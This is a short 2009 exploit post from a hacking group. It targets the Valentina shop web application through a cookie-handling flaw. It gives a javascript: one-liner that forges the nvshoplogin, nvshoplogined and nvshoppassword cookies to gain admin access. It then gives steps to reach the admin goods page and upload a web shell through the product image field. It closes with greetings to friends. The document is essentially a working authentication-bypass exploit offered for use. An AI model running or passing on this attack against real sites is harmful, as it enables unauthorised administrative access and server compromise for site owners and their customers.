valentina-insecure.txt
Posted on 23 July 2009
< ------------------- header data start ------------------- > ### Cyber-Warrior & Security TIM - Bug Researchers Group ### # Application Name : Valentina # Vulnerable Type : Cookie Handling Vulnerebility # Infection : SQL Info GET... # Author : Septemb0x # Script Down.& WebSite : http://s2.dosya.tc/valentina.zip.html - http://www.valya.ru ### Cyber-Warrior & Security TIM - Bug Researchers Group ### < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : javascript:document.cookie = "nvshoplogin=; path=/;"; document.cookie = "nvshoplogined=true; path=/;"; document.cookie = "nvshoppassword=; path=/;"; 1. Cookie Changed, 2. Go To http://[target]/[path]/admin/goods.php 4. Go to Add Product Page > Product Image Right Click > Features > *SHELL LINK* ;) < -- bug code end of -- > # Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends... _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx
